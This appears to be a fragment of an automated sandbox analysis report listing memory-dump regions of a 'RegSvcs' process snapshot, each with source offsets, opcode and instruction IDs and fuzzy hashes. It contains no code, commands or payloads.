                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 88101d22fbe5bbc00d1c53d9a309f271d194775be8aefb8aa398530b85d3667a
                                            • Instruction ID: 6c43060ea65bb45367366658a57a34e6b154de54e2c5bdf2035bc1a1d8b829bc
                                            • Opcode Fuzzy Hash: 88101d22fbe5bbc00d1c53d9a309f271d194775be8aefb8aa398530b85d3667a
                                            • Instruction Fuzzy Hash: CA218E752007019FCB29DF29CD01B56B7F5FF48B04F288468A509CBB61E371EA42DB95
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a7ddf4beab5480d91db4dca6716ceced00bf94e4ed6050fa3471d8e99b1f1c48
                                            • Instruction ID: 2af92c0f1d76ea9c049e230b57ebd9f0e2b63f01039c17e848c12216d08b10f3
                                            • Opcode Fuzzy Hash: a7ddf4beab5480d91db4dca6716ceced00bf94e4ed6050fa3471d8e99b1f1c48
                                            • Instruction Fuzzy Hash: 9E112372385A19BBE32296589C00F2B769D9BD4B60F140428B71CCB2C8EB74DD008796
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6fde2b0e57ef30b952dc0c5118db67ac4dffae3b3d31728a9792c52a7660b4b2
                                            • Instruction ID: ca3c2a12bbe8966f284d4400b08e2099caf0a5c8a5617f225d99a58e25517ceb
                                            • Opcode Fuzzy Hash: 6fde2b0e57ef30b952dc0c5118db67ac4dffae3b3d31728a9792c52a7660b4b2
                                            • Instruction Fuzzy Hash: A621D6B1E00309ABDB10DFAAD8859AEFBF9FF98700F10012EE505E7241D7749A45CB55
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                            • Instruction ID: 6d8e143250d9e196648487a281b32b760e97f915e4b3c33bce756cdf6e594d8f
                                            • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                            • Instruction Fuzzy Hash: FD218172A00209EFDF129F58CC40B9EBBB9EF85310F204419FA00E7251D734DA50DB50
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                            • Instruction ID: 05df8d7511deaf3ed6726f0eef8944df2e63fd0776f3c0d3bf8fe0b1350f1102
                                            • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                            • Instruction Fuzzy Hash: 0511D0B2600A15AFEB229A48CC41F9ABBBCEF80B54F180429F600CB180D671EE44CB55
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a84fdb0e18f3a160a1730a157102becaf40900a06aa07ece98536dbc3fe48827
                                            • Instruction ID: dcaed0cff64357bf68d7a468366fc67fc77f4cbaba18965c8bbb52304c34c39e
                                            • Opcode Fuzzy Hash: a84fdb0e18f3a160a1730a157102becaf40900a06aa07ece98536dbc3fe48827
                                            • Instruction Fuzzy Hash: 7A119D717007159B9B11CF4EC580A26BBEDAF8B750B188069EE0CDF204D6B2DA018790
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                            • Instruction ID: 107c3b3cce41045a02fb865787f315f2965c2bde02e69dbe1c47b8d486611bbe
                                            • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                            • Instruction Fuzzy Hash: 6F217772640645DFDB299F4DC540A66BBE6FB94B14F18883DE94ACBA10C731EE01CB80
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c01122b8246d69b4fe7d9e300b573adbcfe4db28b61ec031a2f0ea0f3157c85d
                                            • Instruction ID: bc70fd34566d9ed3d3f040d4a0ecb0f0ce8707011d6446751dd3d82a5d22e6c1
                                            • Opcode Fuzzy Hash: c01122b8246d69b4fe7d9e300b573adbcfe4db28b61ec031a2f0ea0f3157c85d
                                            • Instruction Fuzzy Hash: 66216F75A00609DFCB14CF58C581A6EBBB9FB89718F24416DD109AB311D771AE06CBD0
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 44964fbe85371938cf351edcc4efc795d081929c94a70d9747e8c56cfa65e6c1
                                            • Instruction ID: b1729f4ed159d839ba570d1f706624c6bc8c29228feb9d8da914a128bdf08b10
                                            • Opcode Fuzzy Hash: 44964fbe85371938cf351edcc4efc795d081929c94a70d9747e8c56cfa65e6c1
                                            • Instruction Fuzzy Hash: 56219071600B00EFDB20CF68C880F66B7F8FF44354F58892DE59AD7250EA30AA40CB61
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 552508b3065500872a45d8cc62bbd363682af7ec4ad2cfd7bc9860f3172d29a8
                                            • Instruction ID: 04cd1614d5823839224dfa92987cc3c6909fda47de81f9191cb6b02381fc617f
                                            • Opcode Fuzzy Hash: 552508b3065500872a45d8cc62bbd363682af7ec4ad2cfd7bc9860f3172d29a8
                                            • Instruction Fuzzy Hash: 82116B333002149FCF19DB28CC80A2BB2A7EFD1774B24452CEA26CB280E930DA02C791
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 225e4af028dd980449a50759c71e76383bc4a587d8fa9457667441c50c095da6
                                            • Instruction ID: 12c9583a5e9cb8bbab0843a0e312252994f07797677776f0f6d1408a6afed30c
                                            • Opcode Fuzzy Hash: 225e4af028dd980449a50759c71e76383bc4a587d8fa9457667441c50c095da6
                                            • Instruction Fuzzy Hash: 89119132340614FBD722DB6DC940F9A77A8EB95B54F21412DF705DB262EA70EA01C7A1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e28403b92f03fc7903d63171d6b2a388cc09aa36057897bf3e9101bf8880bd1e
                                            • Instruction ID: 0c7c63baf0fbcee684eb5eff1142ed476dc14ec758de6f972a022841a54dc576
                                            • Opcode Fuzzy Hash: e28403b92f03fc7903d63171d6b2a388cc09aa36057897bf3e9101bf8880bd1e
                                            • Instruction Fuzzy Hash: 17118C76A01205ABCF25DF59D580E5ABBE9EB94750B2A8179E905EB311F630DE00CB90
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                            • Instruction ID: 40f8747a1b92595415292ab40a88e22ceff7eee1d9f90962b5001cf5e477d4d4
                                            • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                            • Instruction Fuzzy Hash: 2C11B236A00929AFDB19CB58CC05A9DBBF5EF84210F058269E859A7344E675AE51CB80
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                            • Instruction ID: 97260d16db394383ebb0b5181e42e90d69e360f775717b2bb619ca53d039aca2
                                            • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                            • Instruction Fuzzy Hash: 2B2106B5A40B059FD3A0CF29C440B52BBF4FB48B10F10892EE98AC7B40E371E914CB94
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • Instruction ID: 77b1873eeb627388e7ec705bff707a580f3e744a328e1974742e01680d68f8b6
                                            • Opcode Fuzzy Hash: bfefbb8c0e2248d5e1372088d59c4f532cb9c8d92e8a27bac591746c21502fa9
                                            • Instruction Fuzzy Hash: 38012C71A00209ABDB04DFA9D441AAEBBF8EF58344F50406AE915E7391D674AA018BA1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eff566488ef2f5bcecf98296efc35726325fc385b6a3ec055a689072128d0c11
                                            • Instruction ID: 2eeb4d8cbf71c25dea45eda5b7212f949119deed18bc43164080b7794d09ced6
                                            • Opcode Fuzzy Hash: eff566488ef2f5bcecf98296efc35726325fc385b6a3ec055a689072128d0c11
                                            • Instruction Fuzzy Hash: A6012C71A1020AABDB04DFA9D451AAEB7F8EF98304F50406AF905E7351D674AA018BA1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b076bffe63d41686178c57b19bbdc529842cd0407dddc16539924747641b07fb
                                            • Instruction ID: f541539b4d0a9250efba07bcc40c5c0ad247fcba488c9650e189be658450c5dd
                                            • Opcode Fuzzy Hash: b076bffe63d41686178c57b19bbdc529842cd0407dddc16539924747641b07fb
                                            • Instruction Fuzzy Hash: B9014F71A01249ABDB04DFA9D445AEEBBF8BF58310F14405AE905F7280D774EB01CBA5
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                            • Instruction ID: 4bac27bb6d25efb3819fc61b818f0fe5e3ea1eb09c13702bc5d4c4139d08ef11
                                            • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                            • Instruction Fuzzy Hash: 22F0FF7210001DBFEF019F94DD80DAF7BBDEB55398B104125BA1192160D631DE21A7A1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2f639e1e1a780c6f42e84717694f0e45ac49239dc2a1f51c4227b10a5df530d2
                                            • Instruction ID: f64d59e0bfbc6bb539e0c7a67a192fe320514a3779c3bb38925d2cade4fbab60
                                            • Opcode Fuzzy Hash: 2f639e1e1a780c6f42e84717694f0e45ac49239dc2a1f51c4227b10a5df530d2
                                            • Instruction Fuzzy Hash: 6F018536110219ABCF129E94D844EDA3FA6FB4CB64F068105FE18A6220C332DA70EB91
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 12cfc4a26bb1b2fe26c3e8697f087b0a7bc4d921c00fe985fceb701a4671af01
                                            • Instruction ID: 0e851132294604f4865ad64e60ea3469b78a8180eac23ec83b8d43e79d3ad076
                                            • Opcode Fuzzy Hash: 12cfc4a26bb1b2fe26c3e8697f087b0a7bc4d921c00fe985fceb701a4671af01
                                            • Instruction Fuzzy Hash: 1CF024B23847455BF7A4961D8C01B22329EE7C0791F29806AEF05CB2C1FB70DE018B94
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9b8d15748512a9609ac58a680fcfd12d3f697adc1001a8d2a911d94d353419f2
                                            • Instruction ID: dadc7ad04767b18bc3f4bc1aef6e5ebd560ee56288f1a326c236b424a6c58ed0
                                            • Opcode Fuzzy Hash: 9b8d15748512a9609ac58a680fcfd12d3f697adc1001a8d2a911d94d353419f2
                                            • Instruction Fuzzy Hash: 2801AFB0204785DFFB369B6CCD48F293BE8BB40B04F5C0194BA11DBAD6EB78D6418612
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                            • Instruction ID: 5a034d6febbb33082e2a5bb292ffa7a196c94f26772b9bdd53c9c5326ecd65a2
                                            • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                            • Instruction Fuzzy Hash: D4F089353819134BEB77AA2D9A20B2EA75E9F90E52B09252C9759CB6C0DF60D8018791
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3fb75d9e4ae190666a836cd5393bc3cdaa36ea9aa2cfc6061cf69e082a951eaa
                                            • Instruction ID: 808f48b97bbeac63213fb9f64ee200eba888f8933f48907c13422cb841ea83cf
                                            • Opcode Fuzzy Hash: 3fb75d9e4ae190666a836cd5393bc3cdaa36ea9aa2cfc6061cf69e082a951eaa
                                            • Instruction Fuzzy Hash: F2F0AF716097049FD310EF28C945A1ABBE4FF98710F80465ABC98DB390E734EA00C797
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                            • Instruction ID: d0d06dd227a6457bcdb1ecbdcb8c25697f90fbc131315c068b8656a867901c4b
                                            • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                            • Instruction Fuzzy Hash: E7F082337116329BE3319A5ECC84F16B7E8EFD6B60F590165AA08DB264C760ED01D7D1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                            • Instruction ID: 85fe59eb6f5cf158da96034bf3b856023b30145dd2f54c3914523e745d0fab61
                                            • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                            • Instruction Fuzzy Hash: BAF0B472614204EFE714DB25CC01F56B6EDEF98744F188478A945DB260FAB0DE01C654
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac45a1ba7dcbedf0a5b81d4ee29856d72f0d47a036abe52edb0dfe5b44c3a7b6
                                            • Instruction ID: 87b7550bc7849bb7931d0f69995e6686d7b4c0897ce5d2445af4838f86b325dd
                                            • Opcode Fuzzy Hash: ac45a1ba7dcbedf0a5b81d4ee29856d72f0d47a036abe52edb0dfe5b44c3a7b6
                                            • Instruction Fuzzy Hash: 34F04F70A01249AFDB04EF69C515A5EB7F4EF18300F408055A955EB385DA78EB01CB61
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7fd35b826b605c8b2ff35bbbca7c89df082d12acab08f417dd6925d225976c20
                                            • Instruction ID: 9c0ddda46cffb5a72c45fbd614b08842f9befc378f8a63cc33472d3401fde5d8
                                            • Opcode Fuzzy Hash: 7fd35b826b605c8b2ff35bbbca7c89df082d12acab08f417dd6925d225976c20
                                            • Instruction Fuzzy Hash: A1F052319023E4CFE733CBECC048B69BBCC9B48B34F08886AC589C7502CB24DA80C650
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d0f24dbb07334dd826ffdb016c1773dbcd6a72eb72a57ff62caaad8a17c24e71
                                            • Instruction ID: 6439f90a311de9e9c9b2ad23502e3d155630b948e36504b3f5bfb804f254a280
                                            • Opcode Fuzzy Hash: d0f24dbb07334dd826ffdb016c1773dbcd6a72eb72a57ff62caaad8a17c24e71
                                            • Instruction Fuzzy Hash: 73F0277641A79506CB325B2C74602D16F78B782110F6D1485E8A87720FC6748483C320
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ec2df2eb7b9cbe96050ab370fdcf7cf9b58165d4e77db0193ad2ba3060f29f8
                                            • Instruction ID: d74f60074ce1528e9f461aba1d071170b829c41c28ff6e18054ad9226dbe2ebe
                                            • Opcode Fuzzy Hash: 4ec2df2eb7b9cbe96050ab370fdcf7cf9b58165d4e77db0193ad2ba3060f29f8
                                            • Instruction Fuzzy Hash: 6FF0E2716116519FEF33979CC148B517BD49B807A4F0D942DD506C7552C761FB80CAD1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                            • Instruction ID: c78db8a7db3aa7d4c5d29eb7829f1c1ec36f21a2858d0fdd0d86c96324e48079
                                            • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                            • Instruction Fuzzy Hash: 31E092323416012BE7219E5D8C80F47776E9F92B10F440479B6049E251C9E2DE0982A5
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                            • Instruction ID: ed9753b370396955b0149883881204bc11cdd70556354f09abc4c76523160ae8
                                            • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                            • Instruction Fuzzy Hash: 45F0A0721002049FE3208F09D840F52B7F8EB55368F25C129E708EB160E33AED40CBA0
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                            • Instruction ID: ffccefc2245c9dcc5daa57726e773614f65464473e93a2f0de1331140f6123fb
                                            • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                            • Instruction Fuzzy Hash: 0EF0E5392043459FDB1ACF19D050AD57BA8FB41360F004094FC46CB301D736EB81CB95
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                            • Instruction ID: 5153e7afc93dcc967da5abdeef100ea61246689e38cc1ab69750209788614ecc
                                            • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                            • Instruction Fuzzy Hash: 70E0D833244149AFDB211A5D8900B6677E5DBD27A0F1D0429E202DB151DB78DE42C7D8
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9ced5a7c458a03f9b6148b28d1125c899f15810cf31d7d9a6e0e2c8057b69c47
                                            • Instruction ID: 259a08b52940342608f96e6ec66add2efe0519797bf3106d330c4b7fd766e9cf
                                            • Opcode Fuzzy Hash: 9ced5a7c458a03f9b6148b28d1125c899f15810cf31d7d9a6e0e2c8057b69c47
                                            • Instruction Fuzzy Hash: DBF06531A35D914FEB72D7ACD544B5577E9BBE0731F5B05A4D409C7922C724EC80C690
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                            • Instruction ID: 7fd675733be6f0e4d2f153336ad4905eecc2ee46fca47eb0debe12877969e712
                                            • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                            • Instruction Fuzzy Hash: 50E0DF32A00214BFDB2297998E01F9ABEBCDB90FA0F090058B604E70D0E630DF00C690
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                            • Instruction ID: 207262e27608a928cb306de5622a67b12e58dd726148b3c099459f287395febe
                                            • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                            • Instruction Fuzzy Hash: 33E09B316403508BCB258E1DD140A53B7ECDFD5661F198479E90D47612C232F852C6D1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 03738cb30e3e20bf3991c04ed20b721ac9cf9fcaac3cd002590760b694906e02
                                            • Instruction ID: 3225f4b18801f48265648a0d506b2a4a82691740a69dc3fd3147f91173081a9e
                                            • Opcode Fuzzy Hash: 03738cb30e3e20bf3991c04ed20b721ac9cf9fcaac3cd002590760b694906e02
                                            • Instruction Fuzzy Hash: 88E092321006549BC321BB2DDD01F8A779AEBA0364F014515B115971A0CA30AE10C795
                                            Memory Dump Source
